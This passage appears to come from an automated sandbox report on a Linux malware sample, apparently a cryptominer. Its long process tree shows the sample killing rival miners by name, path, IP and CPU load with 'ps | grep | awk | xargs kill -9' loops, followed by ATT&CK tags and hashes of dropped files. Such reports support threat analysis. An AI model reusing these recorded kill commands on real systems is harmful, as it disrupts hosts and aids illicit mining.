  2⤵
  PID:1088
- /bin/grep
  grep -v grep
  2⤵
  PID:1087
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1090
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1086
- /bin/grep
  grep -v grep
  2⤵
  PID:1092
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1091
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:1093
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1094
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1095
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:1098
- /bin/grep
  grep -v grep
  2⤵
  PID:1097
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1096
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1099
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1100
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1104
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:1103
- /bin/grep
  grep -v grep
  2⤵
  PID:1102
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1105
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1101
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:1108
- /bin/grep
  grep -v grep
  2⤵
  PID:1107
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1110
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1106
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1109
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1114
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:1113
- /bin/grep
  grep -v grep
  2⤵
  PID:1112
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1115
- /bin/ps
  ps aux
  2⤵
  PID:1111
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1119
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:1118
- /bin/grep
  grep -v grep
  2⤵
  PID:1117
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1120
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1116
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1124
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:1123
- /bin/grep
  grep -v grep
  2⤵
  PID:1122
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1125
- /bin/ps
  ps aux
  2⤵
  PID:1121
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:1128
- /bin/grep
  grep -v grep
  2⤵
  PID:1127
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1129
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1130
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1126
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1134
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1133
- /bin/grep
  grep -v grep
  2⤵
  PID:1132
- /bin/ps
  ps aux
  2⤵
  PID:1131
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1135
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1139
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1138
- /bin/grep
  grep -v grep
  2⤵
  PID:1137
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1140
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1136
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1143
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1144
- /bin/grep
  grep -v grep
  2⤵
  PID:1142
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1145
- /bin/ps
  ps aux
  2⤵
  PID:1141
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1149
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1148
- /bin/grep
  grep -v grep
  2⤵
  PID:1147
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1150
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1146
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1154
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1153
- /bin/grep
  grep -v grep
  2⤵
  PID:1152
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1155
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1151
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1159
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:1158
- /bin/grep
  grep -v grep
  2⤵
  PID:1157
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1160
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1156
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1164
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:1163
- /bin/grep
  grep -v grep
  2⤵
  PID:1162
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1165
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1161
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1169
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:1168
- /bin/grep
  grep -v grep
  2⤵
  PID:1167
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1170
- /bin/ps
  ps aux
  2⤵
  PID:1166
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:1174
- /bin/grep
  grep -v grep
  2⤵
  PID:1173
- /bin/ps
  ps aux
  2⤵
  PID:1172
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1175
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1176
- /bin/grep
  grep HiPxCJRS
  2⤵
  PID:1180
- /bin/grep
  grep -v grep
  2⤵
  PID:1179
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1178
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1181
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1182
- /bin/grep
  grep http_0xCC030
  2⤵
  PID:1187
- /bin/grep
  grep -v grep
  2⤵
  PID:1186
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1188
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1189
- /bin/ps
  ps aux
  2⤵
  PID:1185
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1195
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:1194
- /bin/grep
  grep -v grep
  2⤵
  PID:1193
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1192
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1196
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1201
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:1200
- /bin/grep
  grep -v grep
  2⤵
  PID:1199
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1202
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1198
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1207
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:1206
- /bin/grep
  grep -v grep
  2⤵
  PID:1205
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1208
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1204
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1214
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:1213
- /bin/grep
  grep -v grep
  2⤵
  PID:1212
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1215
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1211
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1221
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:1220
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1222
- /bin/grep
  grep -v grep
  2⤵
  PID:1219
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1218
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1226
- /bin/grep
  grep -v grep
  2⤵
  PID:1224
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:1225
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1223
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1232
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:1231
- /bin/grep
  grep -v grep
  2⤵
  PID:1230
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1233
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1229
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1239
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:1238
- /bin/grep
  grep -v grep
  2⤵
  PID:1237
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1236
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1240
- /bin/grep
  grep -v grep
  2⤵
  PID:1243
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:1244
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1242
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1245
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1246
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1252
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:1251
- /bin/grep
  grep -v grep
  2⤵
  PID:1250
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1253
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1249
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1258
- /bin/grep
  grep nqscheduler
  2⤵
  PID:1257
- /bin/grep
  grep -v grep
  2⤵
  PID:1256
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1255
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1259
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:1264
- /bin/grep
  grep -v grep
  2⤵
  PID:1263
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1266
- /bin/ps
  ps aux
  2⤵
  PID:1262
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1265
- /bin/grep
  grep "]"
  2⤵
  PID:1272
- /bin/grep
  grep -v aux
  2⤵
  PID:1271
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1274
- /bin/grep
  grep -v grep
  2⤵
  PID:1270
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:1273
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1269
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1278
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:1277
- /bin/grep
  grep -v grep
  2⤵
  PID:1276
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1279
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1275
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1282
- /bin/grep
  grep -v grep
  2⤵
  PID:1283
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:1284
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1285
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1286
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1292
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:1291
- /bin/grep
  grep -v grep
  2⤵
  PID:1290
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1293
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1289
- /bin/grep
  grep -v -
  2⤵
  PID:1299
- /bin/grep
  grep -v /
  2⤵
  PID:1298
- /bin/grep
  grep -v grep
  2⤵
  PID:1297
- /bin/grep
  grep -v _
  2⤵
  PID:1300
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1296
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:1301
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1302
- /bin/grep
  grep -v grep
  2⤵
  PID:1305
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1308
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1304
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1307
- /bin/grep
  grep "\\[^"
  2⤵
  PID:1306
- /bin/grep
  grep rsync
  2⤵
  PID:1311
- /bin/grep
  grep -v grep
  2⤵
  PID:1310
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1312
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1313
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1309
- /bin/grep
  grep watchd0g
  2⤵
  PID:1316
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1317
- /bin/grep
  grep -v grep
  2⤵
  PID:1315
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1318
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1314
- /bin/grep
  grep -v grep
  2⤵
  PID:1320
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1319
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1321
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1322
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1323
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1321
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1321
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1321
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1321
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1321
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1321
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  PID:1326
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1327
- /bin/grep
  grep -v grep
  2⤵
  PID:1325
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1328
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1324
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1331
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1332
- /bin/grep
  grep -v grep
  2⤵
  PID:1330
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1333
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1329
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1337
- /bin/grep
  grep gitee.com
  2⤵
  PID:1336
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1338
- /bin/grep
  grep -v grep
  2⤵
  PID:1335
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1334
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1341
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1342
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1343
- /bin/grep
  grep -v grep
  2⤵
  PID:1340
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1339
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1347
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:1346
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1348
- /bin/grep
  grep -v grep
  2⤵
  PID:1345
- /bin/ps
  ps aux
  2⤵
  PID:1344
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:1351
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1352
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1353
- /bin/grep
  grep -v grep
  2⤵
  PID:1350
- /bin/ps
  ps aux
  2⤵
  PID:1349
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1357
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:1356
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1358
- /bin/grep
  grep -v grep
  2⤵
  PID:1355
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1354
- /bin/grep
  grep kthrotlds
  2⤵
  PID:1361
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1362
- /bin/grep
  grep -v grep
  2⤵
  PID:1360
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1363
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1359
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1367
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:1366
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1368
- /bin/grep
  grep -v grep
  2⤵
  PID:1365
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1364
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1372
- /bin/grep
  grep netdns
  2⤵
  PID:1371
- /bin/grep
  grep -v grep
  2⤵
  PID:1370
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1373
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1369
- /bin/grep
  grep -v grep
  2⤵
  PID:1375
- /bin/grep
  grep watchdogs
  2⤵
  PID:1376
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1374
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1377
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1378
- /bin/ps
  ps aux
  2⤵
  PID:1379
- /bin/grep
  grep -v grep
  2⤵
  PID:1380
- /bin/grep
  grep -v root
  2⤵
  PID:1381
- /bin/grep
  grep -v dblaunch
  2⤵
  PID:1382
- /bin/grep
  grep -v dblaunchs
  2⤵
  PID:1383
- /bin/grep
  grep -v dblaunched
  2⤵
  PID:1384
- /bin/grep
  grep -v apache2
  2⤵
  PID:1385
- /bin/grep
  grep -v atd
  2⤵
  PID:1386
- /bin/grep
  grep -v kdevtmpfsi
  2⤵
  PID:1387
- /bin/grep
  grep -v postgresq1
  2⤵
  PID:1388
- /usr/bin/awk
  awk "\$3>80.0{print \$2}"
  2⤵
  PID:1389
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1390
- /bin/grep
  grep -v aux
  2⤵
  PID:1393
- /bin/grep
  grep " ps"
  2⤵
  PID:1394
- /bin/grep
  grep -v grep
  2⤵
  PID:1392
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1395
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1396
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1391
- /bin/grep
  grep sync_supers
  2⤵
  PID:1399
- /bin/grep
  grep -v grep
  2⤵
  PID:1398
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1397
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1400
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1401
- /bin/grep
  grep cpuset
  2⤵
  PID:1404
- /bin/grep
  grep -v grep
  2⤵
  PID:1403
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1405
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1406
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1402
- /bin/grep
  grep "x]"
  2⤵
  PID:1410
- /bin/grep
  grep -v aux
  2⤵
  PID:1409
- /bin/grep
  grep -v grep
  2⤵
  PID:1408
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1411
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1412
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1407
- /bin/grep
  grep "sh] <"
  2⤵
  PID:1416
- /bin/grep
  grep -v aux
  2⤵
  PID:1415
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1417
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1418
- /bin/grep
  grep -v grep
  2⤵
  PID:1414
- /bin/ps
  ps aux
  2⤵
  PID:1413
- /bin/grep
  grep -v aux
  2⤵
  PID:1421
- /bin/grep
  grep " \\[]"
  2⤵
  PID:1422
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1423
- /bin/grep
  grep -v grep
  2⤵
  PID:1420
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1424
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1419
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:1427
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1428
- /bin/grep
  grep -v grep
  2⤵
  PID:1426
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1429
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1425
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:1432
- /bin/grep
  grep -v grep
  2⤵
  PID:1431
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1433
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:1434
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1430
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1438
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1437
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1439
- /bin/grep
  grep -v grep
  2⤵
  PID:1436
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1435
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:1442
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1443
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1444
- /bin/grep
  grep -v grep
  2⤵
  PID:1441
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1440
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:1447
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1448
- /bin/grep
  grep -v grep
  2⤵
  PID:1446
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1449
- /bin/ps
  ps aux
  2⤵
  PID:1445
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1453
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:1452
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1454
- /bin/grep
  grep -v grep
  2⤵
  PID:1451
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1450
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1458
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:1457
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1459
- /bin/grep
  grep -v grep
  2⤵
  PID:1456
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1455

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit
/var/mail/user

Filesize
847B

MD5
961318c7923a73b1df6b4c51faa08201

SHA1
cebf4e471815e0925d579c35430bb86f3db5779f

SHA256
37aee166bac10edcddcec484610d7d34e61b7849d73a4675156092927276eff5

SHA512
a50edbdcba6458f1882370f05554f54b8de99706641add84dbb8a47c0a96106dac065de060110e7168d10c3e39a687c083676c63b0b9abbb99d6dd876d303cf1

Download Submit
/var/mail/user

Filesize
1KB

MD5
4cb189b76c2792fa4ec5449363d578fe

SHA1
fb9347e5fe73776c2b93e64459542199f0f349f0

SHA256
9673c1164b1399f77736de8366e23b3c5cc888cab41d8055428a24c319c6ab20

SHA512
364aaaf42b8ce997b1293c2fa579a089c00f2436f0b603b5c03c81f74e08a4552bfbbd8b712c5874d885d7e7f68c9adc89a561eba667a9521fd05285fe42d80b

Download Submit
/var/spool/exim4/input/1seh1g-0000C9-5u-D

Filesize
130B

MD5
12006aba46bafce51c29e9c9de1089ef

SHA1
64da73f2bb3009dda14464ecca076da54a5afd27

SHA256
9a512db3adabfa6a60dae6bf5a0e97e00ec5a3e312cbf38d93107964374727c9

SHA512
e7aa4f5469bc353a4a1bb2a38d3752502fab6eea312a974961afc728fe7da82fcf1f5e4000041e51351e41f71dd32e256417104041643908305789531b68a701

Download Submit
/var/spool/exim4/input/1seh1g-0000CC-7a-D

Filesize
147B

MD5
85fdc459631c45918cea0550994657a7

SHA1
aec14689a4a7630aeb3bf0a56a882d4b4007e71f

SHA256
c468a23af329d4812d4857ff0a74d9ec0c0026bb8c3ae1960dfffd22fe664eea

SHA512
647b138ce13cb89f2b4c7f0190e74a6fa45cd03bc545ea4a089728203d03ff71da1b82adbdf860d1a77aca5e2c97593e63151194fbe930ee889c54b4b80224fd

Download Submit
/var/spool/exim4/input/1seh1g-0000CC-7a-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/hdr.753

Filesize
918B

MD5
8c934f5f8509382baefc788712e9cfff

SHA1
3fee52636b6f756c773b4c6e20833b0f02022b22

SHA256
2d74ae082c0c68aa075d084caf24f59acb8c11ad457aa86b988fc0c13ae31688

SHA512
73ce29eeae4b024e0c8f21b384787040852447289c2d457a12ec58582a80ece95f6fd59981d4364a5de784ab88d390c363248bac664369272646899b657dacfc

Download Submit
/var/spool/exim4/msglog/1seh1g-0000C9-5u

Filesize
288B

MD5
0b1b68fd0a2b5589045a21d5f267659f

SHA1
b34504d6f1dcabf922b4047afc55825bffd22ffe

SHA256
08e73165da1172dc993595c4f4c20c1054a9922240889be67669110f13d182c9

SHA512
